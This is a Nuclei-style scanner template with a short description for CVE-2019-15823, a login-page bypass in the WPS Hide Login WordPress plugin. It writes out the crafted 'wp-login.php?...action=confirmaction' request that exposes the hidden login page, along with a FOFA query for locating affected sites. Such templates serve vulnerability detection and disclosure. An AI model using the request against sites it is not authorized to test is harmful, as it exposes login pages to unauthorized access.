Vulnerability Description
The WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass that lets attackers bypass security checks. Exploitation requires sending crafted requests.
id: CVE-2019-15823
info:
  name: WPS Hide Login <= 1.5.2.2 - Login Page Bypass
  author: pussycat0x
  severity: high
  description: |
    WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
  impact: |
    Attackers can bypass login protection, potentially leading to unauthorized access.
  remediation: |
    Update to version 1.5.3 or later.
  reference:
    - https://web.archive.org/web/20230601185557/https://secupress.me/blog/wps-hide-login-v1-5-2-2-multiples-vulnerabilities/
    - https://web.archive.org/web/20230711062924/https://wpscan.com/vulnerability/9469/
  metadata:
    max-request: 2
    verified: true
    fofa-query: body="/wp-content/plugins/wps-hide-login"
    vendor: wpserveur
    product: wps-hide-login
  tags: cve,cve2019,wordpress,wp-plugin,wp,disclosure,wps-hide-login,vuln
flow: http(1) && http(2)
http:
  - method: GET
    path:
      - "{{BaseURL}}"
    host-redirects: true
    matchers:
      - type: word
        part: response
        words:
          - "wps-hide"
        internal: true
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?SECUPRESSaction=confirmaction"
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Username or Email Address</label>')"
          - "contains(body, 'wp-login-lost-password')"
        condition: and
# digest: 4a0a00473045022033aa8639fd9469a32da2ea8b728901eedb80aa49c641c417cf96d67cde737935022100f4d530c2b89ce82d52b09f24863a826c6ac4bbc8916cf2f7001e199306276607:922c64590222798bb761d5b6d8e72950